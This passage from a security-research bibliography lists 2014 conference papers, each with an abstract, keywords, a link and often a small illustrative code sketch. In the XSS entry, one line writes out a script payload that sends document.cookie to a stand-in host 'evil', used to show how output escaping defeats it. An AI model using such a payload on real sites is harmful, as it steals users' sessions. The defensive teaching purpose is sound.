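        ("clearance dominates sensitivity",
         lambda u, o: u["clearance"] >= o["sensitivity"]),
    ]

    def permit(user, obj):
        """AND-combine all rules: one simple instance of an access tree
        whose internal node is AND and whose leaves test attributes."""
        return all(rule(user, obj) for _, rule in RULES)

    alice = {"department": "finance", "clearance": 3}
    report = {"department": "finance", "sensitivity": 2}
    print(permit(alice, report))                                  # True
    print(permit(alice, {"department": "hr", "sensitivity": 1}))  # False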

 

Sanadhya, S.; Agrawal, N.; Singh, S., "Pheromone Base Swarm Approach For Detecting Articulation User Node In Social Networking," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.461,465, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884910 The modern world is living in the aeon of the virtual community, where people connect to each other through relationships of every kind. Social networking is a platform where people share emotions, activities, areas of interest, and so on. Communities in a social network consist of connected user nodes, and some users are common to many communities. Such a user node is a kind of 'social articulation point' (SAP), acting like a bridge between communities. In this paper, with the help of ant colony optimization (ACO), we propose a pheromone-based swarm approach for articulation users (PSAP) to find articulation user points in a social network. ACO is a meta-heuristic that helps solve combinatorial problems such as the TSP, graph coloring, job-shop scheduling, network routing, and machine learning. Hence social networking may be a new platform for ant colony optimization to solve complex tasks in social phenomena.

Keywords: ant colony optimisation; combinatorial mathematics; social sciences; ACO; PSAP; SAP; TSP; ant colony optimization; articulation user node detection; combinational problems; graph color; job shop network routing; machine learning; meta-heuristic; pheromone base swarm approach; social articulation points; social networking; social phenomena; user nodes; virtual community; Cities and towns; Context; Instruments; Signal processing algorithms; ACO; SAP; Swarm-Intelligence; user rank matrices (ID#: 14-3369)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884910&isnumber=6884878
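
The paper finds these bridge users with ant colony optimization; as a deterministic baseline for the same notion, here is the classical DFS (Hopcroft-Tarjan) articulation-point algorithm on a toy friendship graph of our own invention.

    def articulation_points(graph):
        disc, low, aps = {}, {}, set()
        timer = [0]

        def dfs(u, parent):
            disc[u] = low[u] = timer[0]; timer[0] += 1
            children = 0
            for v in graph[u]:
                if v == parent:
                    continue
                if v in disc:
                    low[u] = min(low[u], disc[v])      # back edge
                else:
                    children += 1
                    dfs(v, u)
                    low[u] = min(low[u], low[v])
                    # Non-root u is an AP if a child cannot reach above u.
                    if parent is not None and low[v] >= disc[u]:
                        aps.add(u)
            if parent is None and children > 1:        # root with 2+ children
                aps.add(u)

        for node in graph:
            if node not in disc:
                dfs(node, None)
        return aps

    # Two communities joined only through 'carol'; 'dan' bridges to 'erin'.
    friends = {"alice": ["bob", "carol"], "bob": ["alice", "carol"],
               "carol": ["alice", "bob", "dan"], "dan": ["carol", "erin"],
               "erin": ["dan"]}
    print(articulation_points(friends))   # {'carol', 'dan'}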

 

Singh, B.; Singh, D.; Singh, G.; Sharma, N.; Sibbal, V., "Motion Detection For Video Surveillance," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.578,584, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884919 Motion detection is one of the key techniques in automatic video analysis for extracting crucial information from scenes in video surveillance systems. This paper presents a new algorithm for MOtion DEtection (MODE) that is robust to illumination variations, bootstrapping, dynamic variations, and noise. MODE is a pixel-based, non-parametric method that requires only one frame to construct its model; foreground/background detection starts from the second frame onwards. It employs a new object-tracking method that detects and removes ghost objects rapidly while preventing abandoned objects from decomposing into the background. The algorithm was tested on publicly available video datasets containing challenging scenarios, using a single set of parameters, and proved to outperform other state-of-the-art motion detection techniques.

Keywords: feature extraction; motion estimation; object tracking; video surveillance; MODE; automatic video analysis; bootstrapping; dynamic variations; foreground-background detection; illumination variations; information extraction; motion detection; noise problems; object tracking method; state-of-art motion detection techniques; video datasets; video surveillance systems; Computational modeling; Training; Uncertainty; Background Subtraction; Background modelling; Motion Detection; Video Surveillance (ID#: 14-3370)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884919&isnumber=6884878
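
A minimal NumPy sketch of the pixel-based principle underlying such detectors: model the background from the first frame only (as MODE's single-frame initialization does) and flag pixels whose deviation exceeds a threshold. This shows the principle only; none of MODE's ghost handling or model updating is reproduced, and the frames are synthetic.

    import numpy as np

    H, W, THRESH = 120, 160, 25

    rng = np.random.default_rng(0)
    background = rng.integers(0, 50, (H, W)).astype(np.int16)  # frame 1

    frame = background.copy()
    frame[40:80, 60:100] += 100        # a synthetic moving object appears

    foreground = np.abs(frame - background) > THRESH
    print("moving pixels:", int(foreground.sum()))   # 40*40 = 1600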

 

Mewara, B.; Bairwa, S.; Gajrani, J., "Browser's Defenses Against Reflected Cross-Site Scripting Attacks," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.662,667, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884928 Due to the frequent use of online web applications for various day-to-day activities, web applications are becoming a most suitable target for attackers. Cross-Site Scripting (XSS) is one of the most prominent web-based attacks; it can lead to compromise of the whole browser rather than just the web application from which the attack originated. Securing web applications using server-side solutions alone is not dependable, as developers are not necessarily security-aware. Therefore, browser vendors have tried to evolve client-side filters to defend against these attacks. This paper shows that even the foremost XSS filters deployed by the latest versions of the most widely used web browsers do not provide adequate defense. We evaluate three browsers - Internet Explorer 11, Google Chrome 32, and Mozilla Firefox 27 - against reflected XSS attacks exploiting different types of vulnerabilities. We find that none is completely able to defend against all possible types of reflected XSS vulnerabilities. Further, we evaluate Firefox after installing an add-on named XSS-Me, which is widely used for testing reflected XSS vulnerabilities. Experimental results show that this client-side solution can shield against a greater percentage of vulnerabilities than the other browsers, and suggest that it would be even more effective if integrated inside the browser rather than installed as an extension.

Keywords: online front-ends; security of data; Google Chrome 32; Internet Explorer 11; Mozilla Firefox 27; Web based attack; Web browsers; XSS attack; XSS filters; XSS-Me; online Web applications; reflected cross-site scripting attacks; Browsers; Security; Thyristors; JavaScript; Reflected XSS; XSS-Me; attacker; bypass; exploit; filter (ID#: 14-3371)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884928&isnumber=6884878
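
Client-side filters are a second line of defense; the first is output encoding on the server. The sketch below contrasts reflecting a query parameter raw with reflecting it escaped (the payload is a standard cookie-theft example, not taken from the paper).

    import html

    payload = '<script>location="http://evil/?c="+document.cookie</script>'

    unsafe_page = "<p>You searched for: " + payload + "</p>"           # executes
    safe_page   = "<p>You searched for: " + html.escape(payload) + "</p>"

    print(safe_page)
    # &lt;script&gt;... -- the browser renders the payload as text, so even
    # a browser with no XSS filter at all is not compromised.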

 

Sinha, R.; Uppal, D.; Singh, D.; Rathi, R., "Clickjacking: Existing Defenses And Some Novel Approaches," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.396,401, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884934 With the growth of information technology, the World Wide Web is experiencing a rapid increase in online social network users. A serious threat to the integrity of these users' data that has recently come into the picture is clickjacking. Many server-side and client-side defense mechanisms against clickjacking are available, yet attackers are still exploiting popular online social networks like Facebook and Twitter, tricking users into clicking spam links that flood their walls with unwanted posts. This gives rise to the need for a powerful methodology at the tester, host, and user levels to mitigate clickjacking. This paper discusses the various tools, techniques, and methods available to detect, prevent, or reduce clickjacking attacks, along with the usefulness and shortcomings of each approach. We then summarize the results and analyze what needs to be done in the field of web security to counter clickjacking on both the host and developer sides. Lastly, we test and suggest how clickjacking defenses can be improved at the server side and during development.

Keywords: security of data; social networking (online);Facebook; Twitter; Web security; World Wide Web; clickjacking; information technology; online social networks; spam link; user data integrity; Browsers; Clickjacking; aspect oriented programming; framebusting; iframe; likejacking; user interface randomization; user interface redressing (ID#: 14-3372)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884934&isnumber=6884878
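
Server-side clickjacking defenses largely boil down to telling the browser not to render the page inside a hostile iframe. A minimal sketch using Flask (our choice for illustration, not a tool from the paper):

    from flask import Flask

    app = Flask(__name__)

    @app.after_request
    def deny_framing(response):
        # Legacy header, still widely honoured:
        response.headers["X-Frame-Options"] = "DENY"
        # Modern equivalent via Content Security Policy:
        response.headers["Content-Security-Policy"] = "frame-ancestors 'none'"
        return response

    @app.route("/")
    def index():
        return "This page cannot be overlaid in an attacker's iframe."

    if __name__ == "__main__":
        app.run()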

 

Vamsi, P.R.; Kant, K., "Sybil Attack Detection Using Sequential Hypothesis Testing in Wireless Sensor Networks," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.698,702, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884945 The Sybil attack poses a serious threat to geographic routing. In this attack, a malicious node broadcasts incorrect location, identity, and secret key information, and can tamper with its neighboring nodes to convert them into malicious nodes as well. As the number of Sybil nodes in the network increases, network traffic is seriously affected and data packets may never reach their destinations. To address this problem, researchers have proposed several schemes to detect Sybil attacks; however, most of these schemes assume a costly setup, such as the use of relay nodes, expensive devices, or expensive encryption methods to verify location information. In this paper, the authors present a method to detect Sybil attacks using sequential hypothesis testing. The proposed method has been examined using the Greedy Perimeter Stateless Routing (GPSR) protocol, with analysis and simulation. The simulation results demonstrate that the proposed method is robust in detecting Sybil attacks.

Keywords: network theory (graphs); routing protocols; statistical testing; telecommunication security; wireless sensor networks; GPSR protocol; Sybil attack detection; encryption methods; geographic routing; greedy perimeter stateless routing; location information; malicious node; network traffic; sequential hypothesis testing; wireless sensor networks; Acoustics; Actuators; Bandwidth; IEEE 802.11 Standards; Optimization; Robustness; Wireless sensor networks; Sequential hypothesis testing; Sybil attack; geographic routing; wireless sensor networks (ID#: 14-3373)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884945&isnumber=6884878
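
The statistical machinery behind such a detector is Wald's sequential probability ratio test. The sketch below runs a generic SPRT over binary indicators of location inconsistency; the per-hypothesis probabilities and error targets are illustrative values, not the paper's.

    import math, random

    p0, p1 = 0.1, 0.7         # P(indicator=1) for an honest vs a Sybil node
    alpha, beta = 0.01, 0.01  # false-positive / false-negative targets
    UPPER = math.log((1 - beta) / alpha)    # accept H1 (Sybil)
    LOWER = math.log(beta / (1 - alpha))    # accept H0 (honest)

    def sprt(observations):
        llr, n = 0.0, 0
        for n, x in enumerate(observations, 1):
            # Log-likelihood ratio of this observation under H1 vs H0.
            llr += math.log((p1 if x else 1 - p1) / (p0 if x else 1 - p0))
            if llr >= UPPER:
                return "sybil", n
            if llr <= LOWER:
                return "honest", n
        return "undecided", n

    random.seed(1)
    suspect = (random.random() < p1 for _ in range(100))  # truly a Sybil node
    print(sprt(suspect))   # decides 'sybil' after only a handful of samples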

 

Agarwal, A.K.; Srivastava, D.K., "Ancient Kaṭapayādi System Sanskrit Encryption Technique Unified," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.279,282, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884947 Computers today generate enormous amounts of data and information with each passing moment, and with the production of such huge amounts of information comes the indispensable need for information security. Encryption algorithms today drastically increase file size, so the secure transmission of data requires extra bandwidth. In this paper we propose a system, AKS-SETU, which is also an abbreviation of this paper's title. Using the ancient Sanskrit technique of encryption, AKS-SETU not only encrypts the information but also attempts to decrease the file size. AKS-SETU performs Sanskrit encryption, which we propose to term Sanscryption.

Keywords: cryptography; natural language processing; AKS-SETU; Sanscryption; ancient Kaṭapayādi system Sanskrit encryption technique unified; encryption algorithms; file size; information security; secure data transmission; Barium; Cryptography; Electronic publishing; Encyclopedias; Internet; Encryption; Information security; Kaṭapayādi system; Sanscryption; Sanskrit (ID#: 14-3374)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884947&isnumber=6884878

 

Kulkarni, P.; Kulkarni, S.; Mulange, S.; Dand, A.; Cheeran, A.N., "Speech Recognition Using Wavelet Packets, Neural Networks and Support Vector Machines," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.451,455, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884949 This research article presents two different methods for extracting features for speech recognition. Based on the time-frequency, multi-resolution property of the wavelet transform, the input speech signal is decomposed into various frequency channels. In the first method, the feature set consists of the energies of the different levels obtained by applying wavelet packet decomposition in place of the Discrete Fourier Transform in the classical Mel-Frequency Cepstral Coefficients (MFCC) procedure; these feature sets are compared with the results from MFCC. In the second method, a feature set is obtained by concatenating the different levels that carry significant information after wavelet packet decomposition of the signal. Extracting features from the wavelet transform of the original signals adds more speech features from the approximation and detail components of these signals, which helps achieve higher identification rates. For feature matching, Artificial Neural Networks (ANN) and Support Vector Machines (SVM) are used as classifiers. Experimental results show that the proposed methods improve the recognition rates.

Keywords: feature extraction; neural nets; speech recognition; support vector machines; time-frequency analysis; wavelet transforms; ANN; MFCC procedure; SVM; artificial neural networks; feature extraction; frequency channels; input speech signal decomposition; mel-frequency cepstral coefficients; multiresolution property; speech recognition; support vector machines; time-frequency property; wavelet packet decomposition; wavelet packets; wavelet transform; Artificial neural networks; Mel frequency cepstral coefficient; Speech recognition; Time-frequency analysis; Artificial Neural Networks; Feature Extraction; Support Vector Machines; Wavelet Packet Transform (ID#: 14-3375)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884949&isnumber=6884878
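
The first method above swaps subband energies from a wavelet packet decomposition into the place of the DFT step of MFCC. A minimal sketch of that energy-feature computation using the PyWavelets library (the wavelet choice and depth are illustrative, not the authors' settings):

    import numpy as np
    import pywt

    def wp_energy_features(frame, wavelet="db4", level=4):
        """Log-energies of the terminal wavelet-packet subbands of one frame."""
        wp = pywt.WaveletPacket(data=frame, wavelet=wavelet,
                                mode="symmetric", maxlevel=level)
        nodes = wp.get_level(level, order="freq")   # subbands, low to high
        energies = np.array([np.sum(n.data ** 2) for n in nodes])
        return np.log(energies + 1e-12)

    frame = np.random.randn(400)               # e.g., a 25 ms frame at 16 kHz
    print(wp_energy_features(frame).shape)     # (16,) subband log-energies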

 

Gupta, M.K.; Govil, M.C.; Singh, G., "An Approach To Minimize False Positive In SQLI Vulnerabilities Detection Techniques Through Data Mining," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.407,410, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884962 Dependence on web applications has been increasing very rapidly in recent times for social communication, health, financial transactions, and many other purposes. Unfortunately, the presence of security weaknesses in web applications allows malicious users to exploit various security vulnerabilities and cause application failures. Currently, SQL Injection (SQLI) attacks exploit the most dangerous security vulnerabilities in popular web applications such as eBay, Google, Facebook, and Twitter. Research on taint-based vulnerability detection has been quite intensive in the past decade; however, these techniques are not free from false positive and false negative results. In this paper, we propose an approach to minimize false positives in SQLI vulnerability detection techniques using data mining concepts. We have implemented a prototype tool for PHP and MySQL technologies and evaluated it on six real-world applications and NIST benchmarks. Our evaluation and comparison results show that the proposed technique detects SQLI vulnerabilities with a low percentage of false positives.

Keywords: Internet; SQL; data mining; security of data; social networking (online); software reliability; Facebook; Google; MySQL technology; PHP; SQL injection attack; SQLI vulnerability detection techniques; Twitter; data mining; eBay; false positive minimization; financial transaction; health problem; social communications; taint based vulnerability detection; Computers; Software; SQLI attack; SQLI vulnerability; false positive; input validation; sanitization; taint analysis (ID#: 14-3376)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884962&isnumber=6884878
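
The paper's exact mining features are not reproduced here, but the general idea of classifying taint-analysis warnings as true or false positives can be sketched with a small decision tree; the feature names below are hypothetical:

    # Hedged sketch: label taint warnings using hand-made features
    # [input_sanitized, uses_prepared_stmt, tainted_len, concatenated_into_query]
    from sklearn.tree import DecisionTreeClassifier

    X = [[0, 0, 40, 1],   # unsanitized input concatenated into a query
         [1, 1, 10, 0],   # sanitized input plus prepared statement
         [1, 0,  5, 0],
         [0, 1, 25, 0]]
    y = [1, 0, 0, 0]      # 1 = true SQLI vulnerability, 0 = false positive

    clf = DecisionTreeClassifier(max_depth=3).fit(X, y)
    print(clf.predict([[0, 0, 60, 1]]))   # -> [1], flag as a true positive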

 

Singh, A.K.; Kumar, A.; Nandi, G.C.; Chakroborty, P., "Expression Invariant Fragmented Face Recognition," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.184,189, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884987 Fragmented face recognition suggests a new way to recognize human faces using their most discriminative facial components: the eyes, nose, and mouth. An experimental study performed on 360 different subjects confirms that more than 80% of the full-face features lie within these fragmented components. The framework processes each component independently to find its corresponding match score; the final score is obtained by calculating the weighted majority vote (WMV) of the component match scores. Three different feature extraction techniques, Eigenfaces, Fisherfaces, and the Scale Invariant Feature Transform (SIFT), are applied to full faces and a fragmented face database (ORL dataset). The classification accuracy shows that the strength of local features (SIFT) leads to an encouraging recognition rate for fragmented components, whereas global features (Eigenfaces, Fisherfaces) increase the misclassification error rate. This selection of an optimal subset of the face minimizes comparison time and retains the correct classification rate irrespective of changes in facial expression. A standard Japanese Female Facial Expression dataset (JAFFE) has been used to investigate the impact on fragmented feature components. We obtained a promising classification accuracy of 98.7% with the proposed technique.

Keywords: face recognition; feature extraction; image classification; transforms; visual databases; Fisher-faces; JAFFE; ORL dataset; SIFT; WMV; classification accuracy; discriminative facial components; eigenfaces; expression invariant fragmented face recognition; eyes; feature extraction techniques; fragmented face database; global features; local features; mouth; nose; scale invariant feature transform; standard Japanese female facial expression dataset; weighted majority voting; Databases; Mouth; Nose; Principal component analysis; EigenFaces; Face Recognition; Facial Landmark Localization; FisherFaces; Scale Invariant Feature Transformation; Weighted Majority Voting (ID#: 14-3377)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884987&isnumber=6884878
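
The fusion step described above, weighted majority voting over per-component match scores, is simple enough to sketch directly; the component weights and scores here are hypothetical:

    import numpy as np

    def weighted_majority_vote(component_scores, weights):
        """Each facial component votes for its best-matching gallery identity;
        votes are weighted and the identity with the largest total wins."""
        votes = {}
        for comp, scores in component_scores.items():
            best = int(np.argmax(scores))
            votes[best] = votes.get(best, 0.0) + weights[comp]
        return max(votes, key=votes.get)

    scores = {"eyes":  np.array([0.91, 0.40, 0.33]),
              "nose":  np.array([0.35, 0.62, 0.58]),
              "mouth": np.array([0.88, 0.41, 0.50])}
    weights = {"eyes": 0.5, "nose": 0.2, "mouth": 0.3}
    print(weighted_majority_vote(scores, weights))   # -> identity 0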

 

Pandey, A.; Srivastava, S., "An Approach For Virtual Machine Image Security," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.616,623, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884997 Cloud security, the main hindrance to the adoption of cloud computing, has several especially vulnerable areas of concern: virtualization, data, and storage. To provide virtualization security, the components of virtualization (such as hypervisors, virtual machines, and virtual machine images) must be secured using improved security mechanisms. Among all these components, virtual machine images (VM images) are considered fundamental to overall cloud security and hence must be secured against every possible attack. In this paper, a security protocol is proposed to protect VM images from two possible attacks: a channel attack such as the man-in-the-middle (MITM) attack, and an attack by a malicious executing environment. The protocol uses the concept of distributing the components of a symmetric key, providing integrity-based confidentiality and self-protection based on an encapsulated mobile agent. One key component is generated and distributed in a secure manner, while the other is derived by the host platform itself from its own resource configuration information. To verify the validity of this approach in overcoming different kinds of security attacks, a BAN logic based formal representation is presented.

Keywords: cloud computing; data protection; image processing; protocols; virtual machines; BAN logic based formal representation; MITM attack; VM images; channel attack; cloud computing; cloud security; encapsulated mobile agent; hypervisors; integrity based confidentiality; malicious executing environment; man-in-the-middle attack; resource configuration information; security attacks; security protocol; self-protection; symmetric key component distribution; virtual machine image security; virtualization security; Elasticity; Home appliances; Operating systems; Servers; Virtualization; BAN logic; cloud computing; mobile agent; self-protection approach; virtual machine image security (ID#: 14-3378)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884997&isnumber=6884878
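
The protocol's details are formalized in the paper via BAN logic; the core two-component key idea, with one component distributed securely and the other derived by the host from its own configuration, can be sketched as follows (all details here are illustrative, not the authors' construction):

    import hashlib, os

    def host_component(host_config: bytes) -> bytes:
        # Re-derived locally by the host platform; never transmitted.
        return hashlib.sha256(b"host-component|" + host_config).digest()

    def image_key(distributed: bytes, host_comp: bytes) -> bytes:
        # The VM-image key exists only where both components are present.
        mixed = bytes(a ^ b for a, b in zip(distributed, host_comp))
        return hashlib.sha256(mixed).digest()

    distributed = os.urandom(32)                 # delivered over a secure channel
    cfg = b"cpu=8;ram=32GB;hypervisor=xen-4.4"   # hypothetical host resources
    print(image_key(distributed, host_component(cfg)).hex()[:16], "...")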

 

Sharma, M.; Chaudhary, A.; Mathuria, M.; Chaudhary, S.; Kumar, S., "An Efficient Approach For Privacy Preserving In Data Mining," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.244,249, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6885001 Many organizations collect large amounts of data, which they sometimes use for data mining tasks. However, the collected data may contain private or sensitive information that should be protected. Privacy protection is an important issue when data are released for mining or sharing purposes. Privacy-preserving data mining techniques allow data to be published for mining while preserving the private information of individuals. Many techniques have been proposed for privacy preservation, but they suffer from various types of attacks and information loss. In this paper we propose an efficient approach for privacy preservation in data mining. Our technique protects sensitive data with less information loss, which increases data usability, and also defends the sensitive data against various types of attacks. Data can also be reconstructed using our proposed technique.

Keywords: data mining; data protection; data mining; data usability; information loss; privacy preservation; privacy protection; sensitive data protection; Cancer; Cryptography; Databases; Human immunodeficiency virus; Irrigation; Data mining; K- anonymity; Privacy preserving; Quasi-identifier; Randomization; Sensitive data (ID#: 14-3379)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6885001&isnumber=6884878
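
The abstract does not spell out the technique, but its keywords name k-anonymity and quasi-identifiers. As background on that notion, a minimal check of the k-anonymity property over quasi-identifier columns looks like this:

    from collections import Counter

    def is_k_anonymous(records, quasi_ids, k):
        """True if every quasi-identifier value combination occurs >= k times."""
        groups = Counter(tuple(r[q] for q in quasi_ids) for r in records)
        return all(count >= k for count in groups.values())

    data = [{"age": "30-39", "zip": "482**", "disease": "flu"},
            {"age": "30-39", "zip": "482**", "disease": "HIV"},
            {"age": "20-29", "zip": "481**", "disease": "flu"},
            {"age": "20-29", "zip": "481**", "disease": "cancer"}]
    print(is_k_anonymous(data, ["age", "zip"], k=2))   # -> True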

 

Nandy, A.; Pathak, A.; Chakraborty, P.; Nandi, G.C., "Gait Identification Using Component Based Gait Energy Image Analysis," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.380,385, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6885005 In the modern era of computer vision technology, the gait biometric trait is increasingly used for human identification in video surveillance. This paper discusses the robustness of gait identification irrespective of small fluctuations in a subject's walking pattern. The Gait Energy Image (GEI) is computed on silhouette gait sequences obtained from the OU-ISIR standard gait database. The advantage of working with the GEI is that it preserves shape and motion information in a single averaged gait image with fewer dimensions. Three independent components, the head node, body torso, and leg region, are separated from the subject's GEI in accordance with body segment ratios. A local biometric feature is computed from the shape centroid to the boundary points of each segment. Normality testing of the features for each region of the GEI body frame ascertains the discriminative power of each segment. The similarity between gallery and probe gait energy images is computed by cosine distance, correlation distance, and Jaccard distance, and the performance of the different distance-based metrics is measured by several error metrics.

Keywords: biometrics (access control); computer vision; gait analysis; image motion analysis; image recognition; image segmentation; video surveillance; GEI body frame region; Jaccard distance; OU-ISIR standard gait database; body segment ratio; body torso; component based gait energy image analysis; computer vision technology; correlation distance; cosine distance; discriminative power; distance based metrics; error metrics; gait biometric trait; gait identification; gallery image; human identification; independent components; leg region; local biometric feature; motion information; normality feature testing; performance efficiency; probe gait energy image; shape centroid; shape preserving; silhouette gait sequences; similarity measurement; single averaged gait image; subject walking pattern; video surveillance situation; Image segmentation; Indexes; Robot sensing systems; Standards; Body Centroid; Body Segmentation; Correlation Distance; Cosine Distance; Euclidean Distance; Gait Energy Image; Human Gait; Jaccard Distance; OU-ISIR Gait Database (ID#: 14-3380)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6885005&isnumber=6884878
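
The GEI itself is just the average of aligned binary silhouettes, after which gallery and probe images are compared by the distances named above. A toy full-body sketch follows; note that the paper additionally splits the GEI into head, torso, and leg regions before matching:

    import numpy as np
    from scipy.spatial.distance import cosine, correlation

    def gait_energy_image(silhouettes):
        """Average a sequence of aligned binary silhouettes (T x H x W)."""
        return np.mean(np.asarray(silhouettes, dtype=float), axis=0)

    gallery = gait_energy_image(np.random.randint(0, 2, (30, 64, 44)))
    probe   = gait_energy_image(np.random.randint(0, 2, (28, 64, 44)))
    print("cosine distance:     ", cosine(gallery.ravel(), probe.ravel()))
    print("correlation distance:", correlation(gallery.ravel(), probe.ravel()))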

 

Pande, D.; Sharma, C.; Upadhyaya, V., "Object Detection And Path Finding Using Monocular Vision," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.376,379, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6885028 This project consists of a prototype of an autonomous robot that picks up a desired object (a red can) based solely on camera vision. A robotic clamp and a camera are mounted on the robot, and all information is transferred wirelessly over distances of up to 100 ft. Image processing is done on an external computer using software such as OpenCV, Python, and Microsoft Visual Studio. Using samples and regression analysis, the distance of any pixel and the width of any object can be found. After obstacle detection, a suitable path is chosen. All movement is controlled by a PIC microcontroller with the help of RF transmitter-receiver modules. The system is best suited for non-textured, flat surfaces with little or no movement in the foreground.

Keywords: collision avoidance; microcontrollers; mobile robots; object detection; regression analysis; robot vision; Microsoft; OpenCV; PIC microcontroller; Python; RF transmitter-receiver modules; autonomous robot; camera vision; monocular vision; object detection; path finding; regression analysis; robotic clamp; Visual Studio; Clamps; IEEE 802.11 Standards; Portable computers; Radio frequency; Robots; Autonomous robot; Computer Vision; Image processing; Monocular Vision; Path Finding (ID#: 14-3381)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6885028&isnumber=6884878
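
The distance-from-pixel step rests on a one-time regression from calibration samples. A hedged sketch of that calibration, with made-up sample values:

    import numpy as np

    rows    = np.array([420, 390, 355, 330, 300])   # hypothetical pixel rows
    dist_ft = np.array([2.0, 3.0, 4.5, 6.0, 8.5])   # measured distances (ft)

    # For a fixed camera, distance grows roughly hyperbolically with image row,
    # so a low-order polynomial in 1/row is one simple regression choice.
    coeffs = np.polyfit(1.0 / rows, dist_ft, deg=1)
    print(f"row 370 -> {np.polyval(coeffs, 1.0 / 370):.2f} ft")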


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Publications of Interest



The Publications of Interest section contains bibliographical citations, abstracts if available and links on specific topics and research problems of interest to the Science of Security community.

How recent are these publications?

These bibliographies include recent scholarly research on topics that have been presented or published within the past year. Some represent updates of work presented in previous years; others are new topics.

How are topics selected?

The specific topics are selected from materials that have been peer reviewed and presented at SoS conferences or referenced in current work. The topics are also chosen for their usefulness for current researchers.

How can I submit or suggest a publication?

Researchers willing to share their work are welcome to submit a citation, abstract, and URL for consideration and posting, and to identify additional topics of interest to the community. Researchers are also encouraged to share this request with their colleagues and collaborators.

Submissions and suggestions may be sent to: research (at) securedatabank.net


(ID#:14-3360)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Ad Hoc Network Security



Because they are dynamic, operate over shared wireless facilities, and are proliferating, ad hoc networks are an important area for security research. In the first half of 2014, a number of works addressing both vehicular ad hoc networks (VANETs) and mobile ad hoc networks (MANETs) were published. Here is a list of some of these publications of interest.

  • Kumar, Ankit; Sinha, Madhavi, "Overview on Vehicular Ad Hoc Network And Its Security Issues," Computing for Sustainable Global Development (INDIACom), 2014 International Conference on, vol., no., pp.792,797, 5-7 March 2014. Vehicular ad-hoc networks (VANETs) provide infrastructure-less, rapidly deployable, self-configurable network connectivity. The network is a collection of vehicles interlinked by wireless links and willing to store and forward data for their peers. As vehicles move freely and organize themselves arbitrarily, message routing is done dynamically based on network connectivity. Compared with other ad-hoc networks, VANETs are particularly challenging, due in part to the vehicles' high rate of mobility and the numerous signal-weakening barriers, such as buildings, in their environments. Due to their enormous potential, VANETs have gained increasing attention in both industry and academia; research activities range from lower-layer protocol design to applications and implementation issues. While exchanging information, a secure VANET system should protect itself against unauthorized message injection, message alteration, and eavesdropping. Security is one of the most critical issues for VANETs because their transmissions propagate in open-access (wireless) environments. In recent years VANETs have received increased attention as a potential technology to enhance active and preventive safety on the road as well as travel comfort. Safekeeping and privacy are mandatory in vehicular communications for such technology to be accepted and used. This paper is an attempt to highlight the problems that occur in vehicular ad hoc networks and their security issues.
    Keywords: Authentication; Computer crime; Cryptography; Roads; Safety; Vehicles; Vehicular ad hoc networks; Position based routing; Vehicular ad-hoc networks (VANET); attacks; authentication; availability; confidentiality; data trust; non-repudiation; privacy; security (ID#:14-2011)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6828071&isnumber=6827395
